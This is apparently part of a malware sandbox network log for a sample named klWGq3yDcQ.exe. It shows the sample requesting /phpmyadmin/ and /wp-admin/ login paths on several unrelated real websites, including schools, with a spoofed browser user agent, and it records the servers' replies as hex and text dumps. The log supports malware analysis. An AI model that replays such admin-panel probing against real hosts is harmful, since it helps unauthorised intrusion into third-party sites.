                                                                                                                                                                                                    2023-11-26 05:59:40 UTC1580INData Raw: 36 32 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 20 41 72 69 61 6c 2c 20 73 61
                                                                                                                                                                                                    Data Ascii: 620<!doctype html><html><head> <title>404 - Page Not Found</title> <style type="text/css"> html, body { height: 100%; margin: 0; padding: 0; font-family: Roboto, Helvetica Neue, Arial, sa


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    269192.168.2.462479104.26.7.374436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC206OUTGET /domain_profile.cfm?d=robinsonland.com HTTP/1.1
                                                                                                                                                                                                    Host: www.hugedomains.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC796INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a 76 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 73 69 74 65 5f 76 65 72 73 69 6f 6e 5f 70 68 61 73 65 3d 31 30 38 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 32 30 2d 4e 6f 76 2d 32 30 32 34 20 30 35 3a 35 39 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closecache-control: privatevary: Accept-Encodingset-cookie: site_version_phase=108; expires=Wed, 20-Nov-2024 05:59:
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC573INData Raw: 39 32 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 6f 6b 69 65 79 65 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 63 6f 6f 6b 69 65 79 65 73 2e 63 6f 6d 2f 63 6c 69 65 6e 74 5f 64 61 74 61 2f 65 37 31 62 63 35 33 66 31 63 62 38 38 36 36 36 64 31 36 30 63 31 65 32 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74
                                                                                                                                                                                                    Data Ascii: 925<!DOCTYPE html><html lang="en"><head><script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/e71bc53f1cb88666d160c1e2/script.js"></script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><met
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC1369INData Raw: 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 62 6f 6f 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f
                                                                                                                                                                                                    Data Ascii: <link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/reboot.min.css"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/style.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/css/
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC406INData Raw: 4e 6f 74 6f 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 7a 79 77 36 6d 64 73 2e 63 73 73 22 3e 0a 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 37 31 31 37 33 33 39 2d 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 67 74 61 67
                                                                                                                                                                                                    Data Ascii: Noto+Sans:400,700&display=swap"><link rel="stylesheet" href="https://use.typekit.net/zyw6mds.css"><script async src="https://www.googletagmanager.com/gtag/js?id=UA-7117339-4"></script><script>window.dataLayer = window.dataLayer || [];function gtag
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC1369INData Raw: 31 31 38 34 0d 0a 69 6d 65 6e 73 69 6f 6e 33 27 3a 20 27 73 69 74 65 76 65 72 73 69 6f 6e 27 0d 0a 7d 0d 0a 7d 29 3b 0d 0a 67 74 61 67 28 27 65 76 65 6e 74 27 2c 20 27 70 61 67 65 4c 6f 61 64 27 2c 20 7b 20 27 73 69 74 65 76 65 72 73 69 6f 6e 27 3a 20 27 48 44 76 33 27 20 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 68 72 65 66 3d 22 23 6d 61 69 6e 22 20 63 6c 61 73 73 3d 22 73 6b 69 70 2d 6d 61 69 6e 22 3e 53 6b 69 70 20 74 6f 20 6d 61 69 6e 20 63 6f 6e 74 65 6e 74 3c 2f 61 3e 0a 3c 68 65 61 64 65 72 20 69 64 3d 22 68 65 61 64 65 72 22 20 63 6c 61 73 73 3d 22 68 64 76 33 48 65 61 64 65 72 44 61 72 6b 42 6c 75 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 73 2d 6f 76 65 72 6c 61 79 2d 6d 6f 64 61
                                                                                                                                                                                                    Data Ascii: 1184imension3': 'siteversion'}});gtag('event', 'pageLoad', { 'siteversion': 'HDv3' });</script></head><body><a href="#main" class="skip-main">Skip to main content</a><header id="header" class="hdv3HeaderDarkBlue"><div class="js-overlay-moda
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC1369INData Raw: 49 44 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 48 65 61 64 65 72 20 44 6f 6d 61 69 6e 20 53 65 61 72 63 68 22 3e 0a 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 76 61 6c 75 65 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 6f 6e 43 6c 69 63 6b 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 53 75 62 6d 69 74 46 75 6e 63 28 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 20 22 20 73 74 79 6c 65 3d 22 6d 69 6e 2d 77 69 64 74 68 3a 39 30 70 78 3b 20 68 65 69 67 68 74 3a 33 35 70 78 3b 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 42 75 74 74 6f 6e 49 44 22 3e 53 65 61 72 63 68 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 76 61 6c 75 65 20 69 64 3d
                                                                                                                                                                                                    Data Ascii: ID" aria-label="Header Domain Search"><button type="submit" value class="search-btn" onClick="hdv3HeaderSearchSubmitFunc(); return false; " style="min-width:90px; height:35px;" id="hdv3HeaderSearchButtonID">Search</button><button type="button" value id=
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC1369INData Raw: 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6e 64 65 78 2e 63 66 6d 22 3e 48 6f 6d 65 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 66 61 71 2e 63 66 6d 22 3e 46 41 51 73 3c 2f 62 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44
                                                                                                                                                                                                    Data Ascii: "><a class="nav-link " href="https://www.HugeDomains.com/index.cfm">Home</a></li><li class="nav-item"><a class="nav-link " href="https://www.HugeDomains.com/faq.cfm">FAQs</b></a></li><li class="nav-item"><a class="nav-link " href="https://www.HugeD
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC385INData Raw: 76 3e 0a 3c 2f 6e 61 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6d 61 69 6e 20 22 3e 0a 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 64 75 63 74 2d 66 61 76 2d 77 72 61 70 70 20 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 64 65 2d 77 72 61 70 70 20 64 6e 2d 6d 6f 62 69 6c 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6c 69 64 65 2d 73 69 64 65 62 61 72 2d 62 6c 6f 63 6b 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 73 2d 62 6c 6f 63 6b 2d 69 6e 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 73 2d 62 6c 6f 63 6b 2d 69 6e 6e 65 72 2d 6e 65 77 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 73 2d 62 6c 6f 63 6b 2d 74 69 74 6c 65 20 67 72 65 65 6e 22
                                                                                                                                                                                                    Data Ascii: v></nav></header><main class="site-main "><div class="product-fav-wrapp container"><div class="side-wrapp dn-mobile"><div class="slide-sidebar-block"><div class="ss-block-inner"><div class="ss-block-inner-new"><span class="ss-block-title green"
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC1369INData Raw: 37 66 66 61 0d 0a 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 2e 63 66 6d 3f 64 3d 52 6f 62 69 6e 73 6f 6e 4c 61 6e 64 26 65 3d 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 6d 2d 62 2d 30 20 6d 2d 74 2d 30 20 22 20 69 64 3d 22 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 49 44 22 20 6f 6e 43 6c 69 63 6b 3d 22 24 28 27 23 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 49 44 27 29 2e 61 64 64 43 6c 61 73 73 28 27 68 69 64 64 65 6e 41 74 4c 6f 61 64 27 29 3b 20 24 28 27 23 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 50 72 6f 63 65 49 44 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 68 69 64 64 65 6e 41 74 4c 6f
                                                                                                                                                                                                    Data Ascii: 7ffa<a href="https://www.HugeDomains.com/shopping_cart.cfm?d=RobinsonLand&e=com" class="btn m-b-0 m-t-0 " id="hdv3Billboard197BuyID" onClick="$('#hdv3Billboard197BuyID').addClass('hiddenAtLoad'); $('#hdv3Billboard197BuyProceID').removeClass('hiddenAtLo
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC1369INData Raw: 3d 22 20 70 6c 61 63 65 2d 6f 72 64 65 72 2d 62 74 6e 20 70 61 79 6d 65 6e 74 70 61 79 2d 61 63 63 61 75 6e 74 2d 63 6f 6e 74 65 6e 74 2d 62 74 6e 20 62 74 6e 20 68 69 64 64 65 6e 41 74 4c 6f 61 64 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 20 6d 69 6e 2d 77 69 64 74 68 3a 32 37 33 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 35 70 78 3b 20 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 22 3e 50 72 6f 63 65 73 73 69 6e 67 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 31
                                                                                                                                                                                                    Data Ascii: =" place-order-btn paymentpay-accaunt-content-btn btn hiddenAtLoad" onclick="return false;" style="height:50px; margin-left:0px; min-width:273px; margin-top:0px; margin-bottom:25px; display:flex;">Processing<div class="circularJ"><div class="circularJ_1


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    270192.168.2.461938120.88.73.2384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC182OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC530INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 30 20 47 4d 54 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6d 38 72 37 33 73 66 6b 32 66 75 67 6f 68 72 36 71 32 31 6b 74 67 69 6c 6d 31 3b 20 65 78 70 69 72 65 73 3d 53 75 6e 2c 20 32 36 2d 4e 6f 76 2d 32 30 32 33 20 30 36 3a 35 39 3a 34 30 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 33 36 30 30 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 45 78 70 69 72 65 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:40 GMTTransfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=m8r73sfk2fugohr6q21ktgilm1; expires=Sun, 26-Nov-2023 06:59:40 GMT; Max-Age=3600; path=/; secure; HttpOnlyExpires
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    271192.168.2.462409117.20.63.1484436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC184OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: student.debritto.sch.id
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC358INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 33 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 31 31 37 2e 32 30 2e 36 33 2e 31 34 38 3a 32 30 33 30 2f 70 6d 61 2f 0d 0a 58 2d 43 61 63 68 65 3a 20 48 49 54 20 66 72 6f 6d 20 42 61 63 6b 65 6e 64 0d 0a 53 74 72 69 63 74 2d 54 72 61
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginx/1.20.1Date: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 238Connection: closeLocation: http://117.20.63.148:2030/pma/X-Cache: HIT from BackendStrict-Tra
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC238INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 31 37 2e 32 30 2e 36 33 2e 31 34 38 3a 32 30 33 30 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://117.20.63.148:2030/pma/">here</a>.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    272192.168.2.46266723.185.0.1443
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC215OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: avient.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.avient.com/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC535INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 36 32 32 34 30 30 0d 0a 58 2d 50 61 6e 74 68 65 6f 6e 2d 53 74 79 78 2d 48 6f 73 74 6e 61 6d 65 3a 20 73 74 79 78 2d 66 65 31 2d 62 2d 37 36 34 35 37 38 34 62 37 37 2d 6e 72 76 6a 6c 0d 0a 58 2d 53 74 79 78 2d 52 65 71 2d 49 64 3a 20 66 64 31 63 37 38 66 63 2d 38 63 32 30 2d 31 31 65 65 2d 39 65 65 32 2d 38 36 32 66 65 63 37 36 62 66 32 35
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenConnection: closeContent-Length: 146Content-Type: text/htmlServer: nginxStrict-Transport-Security: max-age=31622400X-Pantheon-Styx-Hostname: styx-fe1-b-7645784b77-nrvjlX-Styx-Req-Id: fd1c78fc-8c20-11ee-9ee2-862fec76bf25
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC146INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    273192.168.2.462651172.67.132.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC217OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: esoft.academy
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://esoft.academy/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC642INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 65 73 6f 66 74 2e 61 63 61 64 65 6d 79 2f 77 70 2d 61 64 6d 69 6e 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeLocation: https://esoft.academy/wp-adminCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{
